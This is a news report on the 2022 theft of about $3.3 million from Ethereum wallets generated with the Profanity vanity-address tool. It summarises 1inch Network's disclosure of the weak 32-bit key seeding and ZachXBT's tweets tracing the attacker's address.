The Ethereum (ETH) vanity address generating tool, Profanity, has been hit by a cyberattack. Decentralized exchange aggregator 1inch Network reported the vulnerability wherein the company issued a warning to users involved in buying and selling crypto on the tool. The hackers have allegedly stolen crypto worth $3.3 million from Profanity despite the warning from 1inch Network, and the company, along with several industry experts, are now investigating the case.
On September 15, 2022, 1inch Network revealed the lack of safety protocols on Profanity via a blog Medium post. According to the exchange aggregator, Profanity uses a random 32-bit vector to seed 256-bit private keys, and its ambiguity in creating vanity addresses might lead hackers to users’ wallet accounts.
ZachXBT Tweets about Profanity tool vulnerability
🚨 RUN, YOU FOOLS 🚨
⚠️ Spoiler: Your money is NOT SAFU if your wallet address was generated with the Profanity tool. Transfer all of your assets to a different wallet ASAP!
— 1inch Network (@1inch) September 15, 2022
After 1inch Network warnings, a blockchain investigator ZachXBT Tweeted about the vulnerability and the stolen funds from the Profanity. In the Tweet, ZachXBT reported, “Appears $3.3m worth of crypto has been exploited by 0x6ae from this vulnerability.” The Tweet also mentioned the attacker’s address, and 1inch replied to the Tweet stating, “RUN, YOU FOOLS, Spoiler: Your money is NOT SAFU if your wallet address was generated with the Profanity tool. Transfer all of your assets to a different wallet ASAP!”.
Appears $3.3m worth of crypto has been exploited by 0x6ae from this vulnerability.
Interestingly the Indexed Finance Exploiter was the first address drained by 0x6ae.
— ZachXBT (@zachxbt) September 17, 2022
However, despite all the losses, ZachXBT posted another Tweet wherein it mentioned that the attackers didn’t fully drain one of the wallets it interacted with while hacking into Profanity. The blockchain investigator shared that their report about the Profanity vulnerability helped an account holder to save 1.2m+ worth of crypto & NFTs.
1Inch explains the Profanity tool vulnerability
1inch contributor noticed the vulnerability in Profanity in early 2022 when the company was using a random 32-bit vector to seed 256-bit private keys. The users suspected that it could lead to hackers getting access to the personal accounts of Profanity users.
The first encounter that led to the overall depletion of $3.3M worth of crypto and NFTs started in June 2022, wherein a contributor received a message from @samczsun. The message was directed towards suspicious activity in one of the 1inch deployer wallets and Synthetix and others.
After investigating a potential scam, 1inch contributors realized that vanity address brute force could be utilized to reverse it back to the original four bln of seeds more efficiently. This includes getting a public key from a vanity address, expanding it to 2 mln public keys, and decrementing them until they reach the seed public key.
1inch concludes that Profanity is one of the most popular tools on the market, and with its high efficiency, it could mean that “most of the Profanity wallets were hacked secretly.” However, the company claims that despite the stolen funds, the wallet address and proofs of the hacker are available on-chain and can be used to track the defaulters who stole the funds.